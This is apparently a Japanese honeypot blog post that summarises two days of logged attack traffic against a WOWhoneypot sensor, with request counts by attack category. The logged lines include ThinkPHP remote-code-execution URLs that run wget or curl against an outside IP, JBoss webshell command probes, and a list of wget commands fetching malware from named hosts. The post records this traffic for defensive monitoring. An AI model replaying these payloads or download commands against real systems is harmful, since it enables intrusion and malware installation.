3 2018-12-15 phpMyAdminの調査 GET /pma/index.php
3 2018-12-15 phpMyAdminの調査 GET /PMA2/index.php
3 2018-12-15 PHPWetherMapの調査 GET /plugins/weathermap/editor.php
3 2018-12-15 PHPWetherMapの調査 GET /phpmy/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdmion/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin/scripts/db___.init.php
3 2018-12-15 phpMyAdminの調査 GET /phpmyadmin/scripts/db___.init.php
3 2018-12-15 phpMyAdminの調査 GET /phpmyadmin/phpmyadmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdminold/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin.old/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpmyadmin-old/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin+++---/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin__/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyadmin_bak/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdmina/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpmyadmin2/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin1/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin123/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAdm1n/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpmyadm1n/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpMyAbmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpma/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpAdmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /phpadmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /mysql/sqlmanager/index.php
3 2018-12-15 phpMyAdminの調査 GET /mysql/mysqlmanager/index.php
3 2018-12-15 phpMyAdminの調査 GET /mysql/index.php
3 2018-12-15 phpMyAdminの調査 GET /mysql/dbadmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /mysqladmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /mysql/admin/index.php
3 2018-12-15 phpMyAdminの調査 GET /mysql-admin/index.php
3 2018-12-15 phpMyAdminの調査 GET /MyAdmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /myadmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /myadmin2/index.php
3 2018-12-15 phpのWebShell設置の調査 GET /muhstiks.php
3 2018-12-15 phpのWebShell設置の調査 GET /muhstik.php
3 2018-12-15 phpのWebShell設置の調査 GET /muhstik-dpr.php
3 2018-12-15 phpのWebShell設置の調査 GET /lol.php
3 2018-12-15 phpのWebShell設置の調査 GET /logon.php
3 2018-12-15 phpのWebShell設置の調査 GET /lala.php
3 2018-12-15 phpのWebShell設置の調査 GET /lala-dpr.php
3 2018-12-15 phpのWebShell設置の調査 GET /knal.php
3 2018-12-15 JBossに対する調査 GET /jexws3/jexws3.jsp?ppp=echo%20Hello%20D3c3mb3r
3 2018-12-15 JBossに対する調査 GET /jexsw2/jexsw2.jsp?ppp=echo%20Hello%20D3c3mb3r
3 2018-12-15 JBossに対する調査 GET /jexinv/jexinv.jsp?ppp=echo%20Hello%20D3c3mb3r
3 2018-12-15 phpMyAdminの調査 GET /index.php
3 2018-12-15 phpのWebShell設置の調査 GET /htdocs.php
3 2018-12-15 phpのWebShell設置の調査 GET /help.php
3 2018-12-15 phpのWebShell設置の調査 GET /hell.php
3 2018-12-15 phpのWebShell設置の調査 GET /desktop.ini.php
3 2018-12-15 phpMyAdminの調査 GET /db_pma.php
3 2018-12-15 phpMyAdminの調査 GET /db/index.php
3 2018-12-15 phpのWebShell設置の調査 GET /db_cts.php
3 2018-12-15 phpMyAdminの調査 GET /dbadmin/index.php
3 2018-12-15 phpのWebShell設置の調査 GET /cmx.php
3 2018-12-15 phpのWebShell設置の調査 GET /cmv.php
3 2018-12-15 phpのWebShell設置の調査 GET /cmdd.php
3 2018-12-15 PHPWetherMapの調査 GET /cacti/plugins/weathermap/editor.php
3 2018-12-15 phpのWebShell設置の調査 GET /appserv.php
3 2018-12-15 phpMyAdminの調査 GET /admin/PMA/index.php
3 2018-12-15 phpMyAdminの調査 GET /admin/pma/index.php
3 2018-12-15 phpMyAdminの調査 GET /admin/phpmyadmin/index.php
3 2018-12-15 phpMyAdminの調査 GET /admin/phpmyadmin2/index.php
3 2018-12-15 phpMyAdminの調査 GET /admin/mysql/index.php
3 2018-12-15 phpMyAdminの調査 GET /admin/mysql2/index.php
3 2018-12-15 phpMyAdminの調査 GET /admin/index.php
2 2018-12-15 phpのWebShell設置の調査 POST /zuoss.php
2 2018-12-15 phpのWebShell設置の調査 POST /zuos.php
2 2018-12-15 phpのWebShell設置の調査 POST /zuoshss.php
2 2018-12-15 phpのWebShell設置の調査 POST /zuoshou.php
2 2018-12-15 phpのWebShell設置の調査 POST /zuoindex.php
2 2018-12-15 phpのWebShell設置の調査 POST /zshmindex.php
2 2018-12-15 phpのWebShell設置の調査 POST /z.php
2 2018-12-15 phpのWebShell設置の調査 POST /yumo.php
2 2018-12-15 phpのWebShell設置の調査 POST /xxx.php
2 2018-12-15 phpのWebShell設置の調査 POST /xw1.php
2 2018-12-15 phpのWebShell設置の調査 POST /x.php
2 2018-12-15 phpのWebShell設置の調査 POST /xiaodai.php
2 2018-12-15 Hadoop YARN ResourceManagerの脆弱性を突く攻撃 POST /ws/v1/cluster/apps/new-application
2 2018-12-15 phpのWebShell設置の調査 POST /wshell.php
2 2018-12-15 phpのWebShell設置の調査 POST /webslee.php
2 2018-12-15 phpのWebShell設置の調査 POST /wc.php
2 2018-12-15 phpのWebShell設置の調査 POST /wan.php
2 2018-12-15 phpのWebShell設置の調査 POST /ver.php
2 2018-12-15 phpのWebShell設置の調査 POST /uuu.php
2 2018-12-15 phpのWebShell設置の調査 POST /u.php
2 2018-12-15 phpのWebShell設置の調査 POST /tomcat.php
2 2018-12-15 phpのWebShell設置の調査 POST /tiandi.php
2 2018-12-15 phpのWebShell設置の調査 POST /sss.php
2 2018-12-15 phpのWebShell設置の調査 POST /Ss.php
2 2018-12-15 phpのWebShell設置の調査 POST /ss.php
2 2018-12-15 phpのWebShell設置の調査 POST /ssaa.php
2 2018-12-15 phpのWebShell設置の調査 POST /she.php
2 2018-12-15 phpのWebShell設置の調査 POST /sha.php
2 2018-12-15 phpのWebShell設置の調査 POST /sean.php
2 2018-12-15 phpのWebShell設置の調査 POST /s1.php
2 2018-12-15 phpのWebShell設置の調査 POST /ruyi.php
2 2018-12-15 phpのWebShell設置の調査 POST /repeat.php
2 2018-12-15 phpのWebShell設置の調査 POST /qw.php
2 2018-12-15 phpのWebShell設置の調査 POST /qwe.php
2 2018-12-15 phpのWebShell設置の調査 POST /qaz.php
2 2018-12-15 phpのWebShell設置の調査 POST /qa.php
2 2018-12-15 phpのWebShell設置の調査 POST /python.php
2 2018-12-15 phpのWebShell設置の調査 POST /ppx.php
2 2018-12-15 phpのWebShell設置の調査 POST /post.php
2 2018-12-15 phpMyAdminの調査 POST /pma.php
2 2018-12-15 phpのWebShell設置の調査 POST /phpstudy.php
2 2018-12-15 phpのWebShell設置の調査 POST /phpinfi.php
2 2018-12-15 phpのWebShell設置の調査 POST /pe.php
2 2018-12-15 phpのWebShell設置の調査 POST /okokok.php
2 2018-12-15 phpのWebShell設置の調査 POST /nuoxi.php
2 2018-12-15 phpのWebShell設置の調査 POST /mz.php
2 2018-12-15 phpのWebShell設置の調査 POST /min.php
2 2018-12-15 phpのWebShell設置の調査 POST /miao.php
2 2018-12-15 phpのWebShell設置の調査 POST /linuxse.php
2 2018-12-15 phpのWebShell設置の調査 POST /ldw.php
2 2018-12-15 phpのWebShell設置の調査 POST /l8.php
2 2018-12-15 phpのWebShell設置の調査 POST /l7.php
2 2018-12-15 phpのWebShell設置の調査 POST /l6.php
2 2018-12-15 phpのWebShell設置の調査 POST /ip.php
2 2018-12-15 phpのWebShell設置の調査 POST /infoo.php
2 2018-12-15 phpのWebShell設置の調査 POST /hm.php
2 2018-12-15 phpのWebShell設置の調査 POST /hh.php
2 2018-12-15 phpのWebShell設置の調査 POST /help.php
2 2018-12-15 phpのWebShell設置の調査 POST /hack.php
2 2018-12-15 phpのWebShell設置の調査 POST /h1.php
2 2018-12-15 phpのWebShell設置の調査 POST /godkey.php
2 2018-12-15 phpのWebShell設置の調査 POST /general.php
2 2018-12-15 phpのWebShell設置の調査 POST /fusheng.php
2 2018-12-15 phpのWebShell設置の調査 POST /feixiang.php
2 2018-12-15 phpのWebShell設置の調査 POST /erwa.php
2 2018-12-15 phpのWebShell設置の調査 POST /core.php
2 2018-12-15 phpのWebShell設置の調査 POST /conf1g.php
2 2018-12-15 phpのWebShell設置の調査 POST /ceshi.php
2 2018-12-15 phpのWebShell設置の調査 POST /caonma.php
2 2018-12-15 phpのWebShell設置の調査 POST /boots.php
2 2018-12-15 phpのWebShell設置の調査 POST /bak.php
2 2018-12-15 phpのWebShell設置の調査 POST /aw.php
2 2018-12-15 phpのWebShell設置の調査 POST /app.php
2 2018-12-15 phpのWebShell設置の調査 POST /api.php
2 2018-12-15 phpのWebShell設置の調査 POST /aotu.php
2 2018-12-15 phpのWebShell設置の調査 POST /ak.php
2 2018-12-15 phpのWebShell設置の調査 POST /ak48.php
2 2018-12-15 phpのWebShell設置の調査 POST /aaaa.php
2 2018-12-15 phpのWebShell設置の調査 POST /9510.php
2 2018-12-15 phpのWebShell設置の調査 POST /92.php
2 2018-12-15 phpのWebShell設置の調査 POST /56.php
2 2018-12-15 phpのWebShell設置の調査 POST /51314.php
2 2018-12-15 phpのWebShell設置の調査 POST /3.php
2 2018-12-15 phpのWebShell設置の調査 POST /1hou.php
2 2018-12-15 phpのWebShell設置の調査 POST /12.php
2 2018-12-15 phpのWebShell設置の調査 POST /1213.php
2 2018-12-15 phpのWebShell設置の調査 GET /z.php
2 2018-12-15 phpMyAdminの調査 GET /scripts/setup.php
2 2018-12-15 PHPWetherMapの調査 GET /phppma/index.php
2 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
2 2018-12-15 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
2 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.3/
2 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.2-rc1/
2 2018-12-15 phpMyAdminの調査 GET /phpmyadmin1/index.php
2 2018-12-15 phpMyAdminの調査 GET /phpmyadmin0/index.php
2 2018-12-15 phpMyAdminの調査 GET /phpMyadmi/index.php
2 2018-12-15 phpMyAdminの調査 GET /mysql_admin/index.php
2 2018-12-15 phpのWebShell設置の調査 GET /muhstik2.php
2 2018-12-15 phpのWebShell設置の調査 GET /log.php
2 2018-12-15 phpのWebShell設置の調査 GET /license.php
2 2018-12-15 phpのWebShell設置の調査 GET /java.php
2 2018-12-15 不正中継の調査 GET hxxp://www.123cha.com
2 2018-12-15 phpのWebShell設置の調査 GET /help-e.php
2 2018-12-15 不正中継の調査 CONNECT www.baidu.com
2 2018-12-15 不正中継の調査 CONNECT 133.130.126.119:43
1 2018-12-15 phpのWebShell設置の調査 POST /xz.php
1 2018-12-15 phpのWebShell設置の調査 POST /xp.php
1 2018-12-15 phpのWebShell設置の調査 POST /wcp.php
1 2018-12-15 phpのWebShell設置の調査 POST /wanan.php
1 2018-12-15 phpのWebShell設置の調査 POST /system.php
1 2018-12-15 phpのWebShell設置の調査 POST /ou2.php
1 2018-12-15 phpのWebShell設置の調査 POST /m.php
1 2018-12-15 phpのWebShell設置の調査 POST /HX.php
1 2018-12-15 phpのWebShell設置の調査 POST /diy.php
1 2018-12-15 phpのWebShell設置の調査 POST /dexgp.php
1 2018-12-15 phpのWebShell設置の調査 POST /default.php
1 2018-12-15 phpのWebShell設置の調査 POST /conf.php
1 2018-12-15 phpのWebShell設置の調査 POST /admn.php
1 2018-12-15 phpのWebShell設置の調査 POST /777.php
1 2018-12-15 phpのWebShell設置の調査 POST /5201314.php
1 2018-12-15 ThinkPHPのログの調査 HEAD /User/Runtime/Logs/Home/18_12_14.log
1 2018-12-15 JBossに対する調査 GET /zecmd/zecmd.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /wstats/wstats.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-15 phpMyAdminの調査 GET /websql/
1 2018-12-15 phpMyAdminの調査 GET /webdb/
1 2018-12-15 phpMyAdminの調査 GET /webadmin/
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /TP/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /TP/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /TP/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /thinkphp/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-15 phpMyAdminの調査 GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php
1 2018-12-15 phpMyAdminの調査 GET /sqlweb/
1 2018-12-15 phpMyAdminの調査 GET /sqlmanager/
1 2018-12-15 phpMyAdminの調査 GET /SQLiteManager/main.php
1 2018-12-15 phpMyAdminの調査 GET /sqlitemanager/main.php
1 2018-12-15 phpMyAdminの調査 GET /SQLiteManager-1.2.4/main.php
1 2018-12-15 phpMyAdminの調査 GET /SQLite/main.php
1 2018-12-15 phpMyAdminの調査 GET /SQlite/main.php
1 2018-12-15 phpMyAdminの調査 GET /sqlite/main.php
1 2018-12-15 JBossに対する調査 GET /shellinvoker/shellinvoker.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-15 調査 GET /script
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-15 phpMyAdminの調査 GET /pmd/index.php
1 2018-12-15 phpMyAdminの調査 GET /PMA/index.php
1 2018-12-15 phpMyAdminの調査 GET /PMA2005/
1 2018-12-15 phpMyAdminの調査 GET /pma2005/
1 2018-12-15 phpMyAdminの調査 GET /PMA/
1 2018-12-15 phpMyAdminの調査 GET /pma/
1 2018-12-15 phpMyAdminの調査 GET /p/m/a/
1 2018-12-15 phpMyAdminの調査 GET /phpmyadmin/index.php
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-4.4.0/index.php
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.1-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.0-rc2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.0-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.0-beta1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.0.4/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.0.3/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.0.2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.0.1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.8.0/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.7.0-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.7.0-pl2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.7.0-pl1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.7.0-beta1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.7.0/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.4-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.4-pl4/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.4-pl3/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.4-pl2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.4-pl1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.4/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.3-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.3-pl1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.2-pl1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.2-beta1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.1-rc2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.1-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.1-pl3/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.1-pl2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.1-pl1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-rc3/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-rc2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-pl3/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-pl2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-pl1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-beta2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-beta1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-alpha2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0-alpha/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.6.0/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.7-pl1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.7/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.6-rc2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.6-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.6/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.5-rc2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.5-rc1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.5-pl1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.5/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.4/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.5.1/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.2.6/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2.2.3/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin-2/
1 2018-12-15 phpMyAdminの調査 GET /phpmyadmin2/
1 2018-12-15 phpMyAdminの調査 GET /phpMyAdmin/
1 2018-12-15 phpMyAdminの調査 GET /phpmyadmin/
1 2018-12-15 phpMyAdminの調査 GET /phpmy-admin/
1 2018-12-15 phpMyAdminの調査 GET /php-myadmin/
1 2018-12-15 phpMyAdminの調査 GET /php-my-admin/
1 2018-12-15 phpMyAdminの調査 GET /phpmanager/
1 2018-12-15 phpMyAdminの調査 GET /openserver/phpmyadmin/
1 2018-12-15 phpMyAdminの調査 GET /mysqlmanager/
1 2018-12-15 phpMyAdminの調査 GET /mysqladmin/
1 2018-12-15 phpMyAdminの調査 GET /mysql-admin/
1 2018-12-15 phpMyAdminの調査 GET /mysql/
1 2018-12-15 phpMyAdminの調査 GET /myadmin/
1 2018-12-15 phpMyAdminの調査 GET /main.php
1 2018-12-15 JBossに対する調査 GET /jvrx/cmd.jsp?pwd=everymorning&cmd=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /jexws4/jexws4.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /jexws2/jexws2.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /jexinv4/jexinv4.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /jexinv3/jexinv3.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /jbws/jbws.jsp?eval=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /jbossass/jbossass.jsp?ppp=echo%20Hello%20D3c3mb3r
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=wget%2046.30.43.159:81/zzt
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-15 JBossに対する調査 GET /iesvc/iesvc.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /idssvc/idssvc.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-15 hudsonの調査 GET /hudson/script
1 2018-12-15 不正中継の調査 GET hxxp://www.msftncsi.com/ncsi.txt
1 2018-12-15 不正中継の調査 GET hxxp://www.ip.cn/
1 2018-12-15 不正中継の調査 GET hxxp://www.123cha.com/
1 2018-12-15 不正中継の調査 GET hxxp://api.ipify.org/
1 2018-12-15 不正中継の調査 GET hxxp://112.35.88.28:10083/index.php
1 2018-12-15 不正中継の調査 GET hxxp://112.35.66.7:10083/index.php
1 2018-12-15 ThinkPHPの脆弱性を突いた攻撃 GET /html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP
1 2018-12-15 D-Linkルータの脆弱性(CVE-2015-2051)の調査 GET /HNAP1/
1 2018-12-15 JBossに対する調査 GET /HCEGH/xunfeng.jsp?comment=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /demo/404.jsp?bjh=echo%20Hello%20D3c3mb3r
1 2018-12-15 phpMyAdminの調査 GET /dbadmin/
1 2018-12-15 JBossに対する調査 GET /console/jspzxc.jsp?cmd=echo%20Hello%20D3c3mb3r
1 2018-12-15 JBossに対する調査 GET /a/pwn.jsp?cmd=echo%20Hello%20D3c3mb3r
1 2018-12-15 phpMyAdminの調査 GET /agSearch/SQlite/main.php
1 2018-12-15 phpMyAdminの調査 GET /admin/
1 2018-12-15 不正中継の調査 CONNECT www.baidu.com:443
1 2018-12-15 不正中継の調査 CONNECT cn.bing.com:443

以上です。

ハニーポットのログ分析(2018/12/14)

WOWhoneypotの2018/12/14(金) (運用191日目)の簡易分析です。
本日の総アクセス件数は 697件です。

本日の主なアクセスは以下です。

phpのWebShell設置の調査:356件
phpMyAdminの調査:140件
JBossに対する調査:40件
Tomcat管理ページへのブルートフォース攻撃:18件
Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃:16件
・(新規)ThinkPHP5.xの任意のコード実行可能な脆弱性を突いた攻撃:2件
「GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=shell_exec&vars1]]=curl%2046.30.43.159:81/zz」
最近流行りだしたもののようです。PoCは以下にありました。
https://github.com/theLSA/tp5-getshell/blob/master/tp5-getshell.py

本日のドメイン名でのアクセスは以下です。

8 POST /wp-login.php
3 GET /
2 GET /robots.txt 

本日のハンティングログは以下です。

4 2018-12-14 wget -c hxxp://wap.tfddos[.]net:57843/linux
1 2018-12-14 wget hxxp://209.141.33[.]119/avtechsh
1 2018-12-14 wget -c hxxp://47.93.189[.]22:666/VIP
1 2018-12-14 wget -c hxxp://47.93.189[.]22:666/LIVIP
1 2018-12-14 wget -c hxxp://154.85.99[.]85:8080/5325
1 2018-12-14 wget -c hxxp://120.210.204[.]182:55896/linux260 

 

以下が全アクセスログです。

件数 日付 種別 リクエス
82 2018-12-14 アクセス GET /
18 2018-12-14 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
16 2018-12-14 Apache Struts2脆弱性S2-045(CVE-2017-5638)を突く攻撃 GET /index.action
8 2018-12-14 WordPressの調査 POST /wp-login.php
7 2018-12-14 phpのWebShell設置の調査 POST /qq.php
7 2018-12-14 phpのWebShell設置の調査 POST /confg.php
6 2018-12-14 phpのWebShell設置の調査 POST /1.php
5 2018-12-14 phpのWebShell設置の調査 POST /test.php
4 2018-12-14 phpのWebShell設置の調査 POST /xx.php
4 2018-12-14 phpのWebShell設置の調査 POST /s.php
4 2018-12-14 phpのWebShell設置の調査 GET /shell.php
3 2018-12-14 phpのWebShell設置の調査 POST /z.php
3 2018-12-14 phpのWebShell設置の調査 POST /x.php
3 2018-12-14 phpのWebShell設置の調査 POST /q.php
3 2018-12-14 phpのWebShell設置の調査 POST /2.php
3 2018-12-14 phpMyAdminの調査 GET /www/phpMyAdmin/index.php
3 2018-12-14 phpMyAdminの調査 GET /web/phpMyAdmin/index.php
3 2018-12-14 phpMyAdminの調査 GET /tools/phpMyAdmin/index.php
3 2018-12-14 phpMyAdminの調査 GET /phpMyAdmin/phpMyAdmin/index.php
3 2018-12-14 phpのWebShell設置の調査 GET /cmd.php
3 2018-12-14 phpMyAdminの調査 GET /claroline/phpMyAdmin/index.php
3 2018-12-14 phpMyAdminの調査 GET /admin/phpMyAdmin/index.php
2 2018-12-14 IIS脆弱性(CVE-2017-7269)を突く攻撃 PROPFIND /
2 2018-12-14 phpのWebShell設置の調査 POST /zuoss.php
2 2018-12-14 phpのWebShell設置の調査 POST /zuos.php
2 2018-12-14 phpのWebShell設置の調査 POST /zuoshss.php
2 2018-12-14 phpのWebShell設置の調査 POST /zuoshou.php
2 2018-12-14 phpのWebShell設置の調査 POST /zuoindex.php
2 2018-12-14 phpのWebShell設置の調査 POST /yumo.php
2 2018-12-14 phpのWebShell設置の調査 POST /yao.php
2 2018-12-14 phpのWebShell設置の調査 POST /xz.php
2 2018-12-14 phpのWebShell設置の調査 POST /xxx.php
2 2018-12-14 phpのWebShell設置の調査 POST /xw1.php
2 2018-12-14 phpのWebShell設置の調査 POST /xshell.php
2 2018-12-14 phpのWebShell設置の調査 POST /xiao.php
2 2018-12-14 phpのWebShell設置の調査 POST /wuwu11.php
2 2018-12-14 Hadoop YARN ResourceManagerの脆弱性を突く攻撃 POST /ws/v1/cluster/apps/new-application
2 2018-12-14 phpのWebShell設置の調査 POST /wshell.php
2 2018-12-14 phpのWebShell設置の調査 POST /w.php
2 2018-12-14 WordPressの調査 POST /wp-admins.php
2 2018-12-14 phpのWebShell設置の調査 POST /weixiao.php
2 2018-12-14 phpのWebShell設置の調査 POST /webslee.php
2 2018-12-14 phpのWebShell設置の調査 POST /wcp.php
2 2018-12-14 phpのWebShell設置の調査 POST /wc.php
2 2018-12-14 phpのWebShell設置の調査 POST /wan.php
2 2018-12-14 phpのWebShell設置の調査 POST /wanan.php
2 2018-12-14 phpのWebShell設置の調査 POST /ver.php
2 2018-12-14 phpのWebShell設置の調査 POST /uuu.php
2 2018-12-14 phpのWebShell設置の調査 POST /u.php
2 2018-12-14 phpのWebShell設置の調査 POST /tomcat.php
2 2018-12-14 phpのWebShell設置の調査 POST /tiandi.php
2 2018-12-14 phpのWebShell設置の調査 POST /system.php
2 2018-12-14 phpのWebShell設置の調査 POST /sss.php
2 2018-12-14 phpのWebShell設置の調査 POST /Ss.php
2 2018-12-14 phpのWebShell設置の調査 POST /ssaa.php
2 2018-12-14 phpのWebShell設置の調査 POST /sheep.php
2 2018-12-14 phpのWebShell設置の調査 POST /sha.php
2 2018-12-14 phpのWebShell設置の調査 POST /qw.php
2 2018-12-14 phpのWebShell設置の調査 POST /qwe.php
2 2018-12-14 phpのWebShell設置の調査 POST /qaz.php
2 2018-12-14 phpのWebShell設置の調査 POST /qaq.php
2 2018-12-14 phpのWebShell設置の調査 POST /qa.php
2 2018-12-14 phpのWebShell設置の調査 POST /ppx.php
2 2018-12-14 phpのWebShell設置の調査 POST /post.php
2 2018-12-14 phpのWebShell設置の調査 POST /phpStudy.php
2 2018-12-14 phpのWebShell設置の調査 POST /phpstudy.php
2 2018-12-14 phpのWebShell設置の調査 POST /phpinfi.php
2 2018-12-14 phpのWebShell設置の調査 POST /pe.php
2 2018-12-14 phpのWebShell設置の調査 POST /ou2.php
2 2018-12-14 phpのWebShell設置の調査 POST /mz.php
2 2018-12-14 phpのWebShell設置の調査 POST /mx.php
2 2018-12-14 phpのWebShell設置の調査 POST /m.php?pbid=open
2 2018-12-14 phpのWebShell設置の調査 POST /min.php
2 2018-12-14 phpのWebShell設置の調査 POST /miao.php
